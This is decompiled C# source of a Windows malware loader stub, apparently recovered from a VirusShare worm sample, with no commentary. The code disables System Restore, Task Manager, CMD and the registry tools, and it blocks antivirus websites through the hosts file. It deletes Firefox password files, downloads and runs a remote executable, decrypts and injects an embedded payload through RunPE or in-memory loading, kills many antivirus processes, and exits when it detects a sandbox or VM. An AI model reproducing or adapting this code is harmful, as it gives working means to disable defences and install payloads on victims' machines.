// Decompiled with JetBrains decompiler // Type: BCV5StuB.Form1 // Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null // MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe using BCV5StuB.My; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.IO; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; namespace BCV5StuB { [DesignerGenerated] public class Form1 : Form { private IContainer components; [AccessedThroughProperty("Label1")] private Label _Label1; [AccessedThroughProperty("WebBrowser1")] private WebBrowser _WebBrowser1; [AccessedThroughProperty("Button1")] private Button _Button1; [AccessedThroughProperty("CheckBox1")] private CheckBox _CheckBox1; private string TPath; private string filetoinject; private const string FileFucker = "Blackout"; private string filetodo; public Form1() { this.Load += new EventHandler(this.Form1_Load); this.TPath = Path.GetTempPath(); this.InitializeComponent(); } [DebuggerNonUserCode] protected override void Dispose(bool disposing) { try { if (!disposing || this.components == null) return; this.components.Dispose(); } finally { base.Dispose(disposing); } } [DebuggerStepThrough] private void InitializeComponent() { this.Label1 = new Label(); this.WebBrowser1 = new WebBrowser(); this.Button1 = new Button(); this.CheckBox1 = new CheckBox(); this.SuspendLayout(); this.Label1.AutoSize = true; Label label1_1 = this.Label1; Point point1 = new Point(102, 62); Point point2 = point1; label1_1.Location = point2; this.Label1.Name = "Label1"; Label label1_2 = this.Label1; Size size1 = new Size(39, 13); Size size2 = size1; label1_2.Size = size2; this.Label1.TabIndex = 0; this.Label1.Text = "Label1"; WebBrowser webBrowser1_1 = this.WebBrowser1; point1 = new Point(169, 62); Point point3 = point1; webBrowser1_1.Location = point3; WebBrowser webBrowser1_2 = this.WebBrowser1; size1 = new Size(20, 20); Size size3 = size1; webBrowser1_2.MinimumSize = size3; this.WebBrowser1.Name = "WebBrowser1"; WebBrowser webBrowser1_3 = this.WebBrowser1; size1 = new Size(176, 162); Size size4 = size1; webBrowser1_3.Size = size4; this.WebBrowser1.TabIndex = 1; Button button1_1 = this.Button1; point1 = new Point(199, 13); Point point4 = point1; button1_1.Location = point4; this.Button1.Name = "Button1"; Button button1_2 = this.Button1; size1 = new Size(75, 23); Size size5 = size1; button1_2.Size = size5; this.Button1.TabIndex = 2; this.Button1.Text = "Button1"; this.Button1.UseVisualStyleBackColor = true; this.CheckBox1.AutoSize = true; CheckBox checkBox1_1 = this.CheckBox1; point1 = new Point(49, 139); Point point5 = point1; checkBox1_1.Location = point5; this.CheckBox1.Name = "CheckBox1"; CheckBox checkBox1_2 = this.CheckBox1; size1 = new Size(81, 17); Size size6 = size1; checkBox1_2.Size = size6; this.CheckBox1.TabIndex = 3; this.CheckBox1.Text = "CheckBox1"; this.CheckBox1.UseVisualStyleBackColor = true; this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; size1 = new Size(409, 248); this.ClientSize = size1; this.Controls.Add((Control) this.CheckBox1); this.Controls.Add((Control) this.Button1); this.Controls.Add((Control) this.WebBrowser1); this.Controls.Add((Control) this.Label1); this.MaximizeBox = false; this.MinimizeBox = false; this.Name = nameof (Form1); this.Text = nameof (Form1); this.ResumeLayout(false); this.PerformLayout(); } internal virtual Label Label1 { [DebuggerNonUserCode] get => this._Label1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value; } internal virtual WebBrowser WebBrowser1 { [DebuggerNonUserCode] get => this._WebBrowser1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._WebBrowser1 = value; } internal virtual Button Button1 { [DebuggerNonUserCode] get => this._Button1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value; } internal virtual CheckBox CheckBox1 { [DebuggerNonUserCode] get => this._CheckBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value; } private void Form1_Load(object sender, EventArgs e) { this.Visible = false; this.ShowInTaskbar = false; bool flag = Form1.is64Bit(); string[] strArray = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "Blackout"); string str1 = strArray[7]; string str2 = strArray[8]; string str3 = strArray[9]; string str4 = strArray[10]; string address = strArray[11]; string str5 = strArray[12]; string str6 = strArray[13]; string str7 = strArray[14]; string str8 = strArray[15]; string str9 = strArray[16]; if (Conversions.ToBoolean(strArray[17])) MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", (object) "1", RegistryValueKind.DWord); if (Conversions.ToBoolean(str9)) MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord); if (Conversions.ToBoolean(str8)) { StreamWriter streamWriter = new StreamWriter("C:\\Windows\\System32\\drivers\\etc\\hosts", true); string str10 = "\n 127.0.0.1 www.virustotal.com"; string str11 = "\n 127.0.0.1 www.bitdefender.com"; string str12 = "\n 127.0.0.1 www.virusscan.jotti.org"; string str13 = "\n 127.0.0.1 www.scanner.novirusthanks.org"; streamWriter.Write(str10); streamWriter.Write("\r\n" + str11); streamWriter.Write("\r\n" + str12); streamWriter.Write("\r\n" + str13); streamWriter.Close(); } if (Conversions.ToBoolean(str7)) { try { MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } if (Conversions.ToBoolean(str6)) { string str14 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles"; if (Directory.Exists(str14)) { try { foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str14)) { try { foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory)) { if (file.Contains("signon")) { try { MyProject.Computer.FileSystem.DeleteFile(file); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } } if (Conversions.ToBoolean(str5)) { try { Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } if (Conversions.ToBoolean(str1)) usb.usb_sp(); if (MyProject.Computer.FileSystem.FileExists(this.TPath + "123.exe")) MyProject.Computer.FileSystem.DeleteFile(this.TPath + "123.exe"); if (Conversions.ToBoolean(str4)) { MyProject.Computer.Network.DownloadFile(address, this.TPath + "123.exe"); Process.Start(this.TPath + "123.exe"); } if (Conversions.ToBoolean(str2)) rc4.Startup(); if (Conversions.ToBoolean(str3)) { Form1.mofo(); Form1.AntiAntiGen(); Form1.AntiAsquared(); Form1.AntiAvast(); Form1.AntiAVG(); Form1.AntiBullGuard(); Form1.AntiClamAV(); Form1.AntiComodo(); Form1.AntiEstNod32(); Form1.AntiEwido(); Form1.AntiFPROT6(); Form1.AntiKaspersky(); Form1.AntiMcAfee(); Form1.AntiNorton(); Form1.AntiOfficeScan(); Form1.AntiOutPost(); Form1.AntiPCCillin(); Form1.AntiServerProtect(); Form1.AntiSpySweeper(); Form1.AntiThreatExpert(); Form1.AntiVirtualPC(); Form1.AntiZoneAlarm(); } if (Conversions.ToBoolean(strArray[5])) { this.filetodo = rc4.rc4(strArray[6], strArray[4]); string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); FileSystem.FileOpen(5, folderPath + "\\msconfig_settings.exe", OpenMode.Binary, OpenAccess.ReadWrite); FileSystem.FilePut(5, this.filetodo, -1L, false); FileSystem.FileClose(5); Process.Start(folderPath + "\\msconfig_settings.exe"); } if (Conversions.ToBoolean(strArray[2])) { int num = (int) Interaction.MsgBox((object) strArray[1]); } if (flag) { try { if (this.ScanForDotNet()) { Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0)))); thread.TrySetApartmentState(ApartmentState.STA); thread.Start((object) this.filetoinject); this.Close(); } else { this.filetoinject = rc4.rc4(strArray[3], strArray[4]); string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite); FileSystem.FilePut(5, this.filetoinject, -1L, false); FileSystem.FileClose(5); Process.Start(folderPath + "\\msconfig.exe"); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Environment.Exit(0); ProjectData.ClearProjectError(); } } else { this.filetoinject = rc4.rc4(strArray[3], strArray[4]); Encoding.Default.GetBytes(this.filetoinject); if (this.ScanForDotNet()) { Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0)))); thread.TrySetApartmentState(ApartmentState.STA); thread.Start((object) this.filetoinject); this.Close(); } else { try { new RunPE().SRexec(Encoding.Default.GetBytes(this.filetoinject), Process.GetCurrentProcess().MainModule.FileName); } catch (Exception ex1) { ProjectData.SetProjectError(ex1); try { this.filetoinject = rc4.rc4(strArray[3], strArray[4]); string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite); FileSystem.FilePut(5, this.filetoinject, -1L, false); FileSystem.FileClose(5); Process.Start(folderPath + "\\msconfig.exe"); } catch (Exception ex2) { ProjectData.SetProjectError(ex2); Environment.Exit(0); ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); } } } } public static bool is64Bit() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0; public static void AntiSandboxie(Form frmSelect) { label_0: int num1; int num2; try { ProjectData.ClearProjectError(); num1 = -2; label_1: int num3 = 2; if (!frmSelect.Text.Contains("#")) goto label_9; label_2: num3 = 3; frmSelect.Close(); ProjectData.EndApp(); goto label_9; label_4: num2 = num3; switch (num1 > -2 ? num1 : 1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_0; case 2: goto label_1; case 3: goto label_2; case 4: case 5: case 6: goto label_9; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_4; } throw ProjectData.CreateProjectError(-2146828237); label_9: if (num2 == 0) return; ProjectData.ClearProjectError(); } public static void AntiMcAfee() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiAVG() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiAsquared() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0) processes[index].Kill(); checked { ++index; } } } private void RunFromMemory(byte[] bytes) { Assembly assembly = Assembly.Load(bytes); MethodInfo entryPoint = assembly.EntryPoint; object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)))); entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1] { (object) new string[1]{ "1" } }); } public void runit(string split) { byte[] bytes = Encoding.GetEncoding(1252).GetBytes(split); Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.RunFromMemory((byte[]) a0))); thread.TrySetApartmentState(ApartmentState.STA); thread.Start((object) bytes); this.Close(); } private bool ScanForDotNet() { if (!this.filetoinject.Contains("")) return false; bool flag; return Operators.CompareString(Strings.Split(this.filetoinject, "")[1].ToLower(), "", false) != 0 || flag; } public static void AntiAvast() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiClamAV() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiComodo() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiEwido() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiFPROT6() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiKaspersky() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiBullGuard() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiZoneAlarm() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiAntiGen() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiNorton() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiOfficeScan() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiPCCillin() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiServerProtect() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiSpySweeper() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiVirtualPC() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiOutPost() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public static void AntiEstNod32() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName); public static void mofo() { Form1.seekit("MSASCui"); Form1.seekit("msmpeng"); Form1.AntiSandboxie(); Form1.IsVmWare(); Form1.AntiThreatExpert(); Form1.checkUsername(); Form1.checkComputername(); } private static void seekit(string gay1) { Process[] processes = Process.GetProcesses(); int index = 0; while (index < processes.Length) { Process process = processes[index]; if (process.ProcessName.Contains(gay1)) { try { process.Kill(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } checked { ++index; } } } private static void checkUsername() { List stringList = new List(); stringList.Add("UserName"); stringList.Add("User"); stringList.Add("honey"); stringList.Add("sandbox"); stringList.Add("currentuser"); stringList.Add("User"); try { foreach (string Right in stringList) { if (Operators.CompareString(Environment.UserName, Right, false) == 0) Environment.Exit(0); } } finally { List.Enumerator enumerator; enumerator.Dispose(); } } private static void checkComputername() { List stringList = new List(); stringList.Add("ComputerName"); stringList.Add("COMPUTERNAME"); stringList.Add("DELL-D3E62F7E26"); stringList.Add("DWI-9625AC2E275"); stringList.Add("MICHAEL-F156CF7"); try { foreach (string Right in stringList) { if (Operators.CompareString(Environment.MachineName, Right, false) == 0) Environment.Exit(0); } } finally { List.Enumerator enumerator; enumerator.Dispose(); } } public static void AntiSandboxie() { if (Process.GetProcessesByName("SbieSvc").Length < 1) return; Environment.Exit(0); } public static void IsVmWare() { string str1 = "VMDragDetectWndClass"; ref string local1 = ref str1; string str2 = (string) null; ref string local2 = ref str2; if (Form1.FindWindow(ref local1, ref local2) != 0L) return; Environment.Exit(0); } private static void AntiThreatExpert() { if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample")) return; Environment.Exit(0); } } }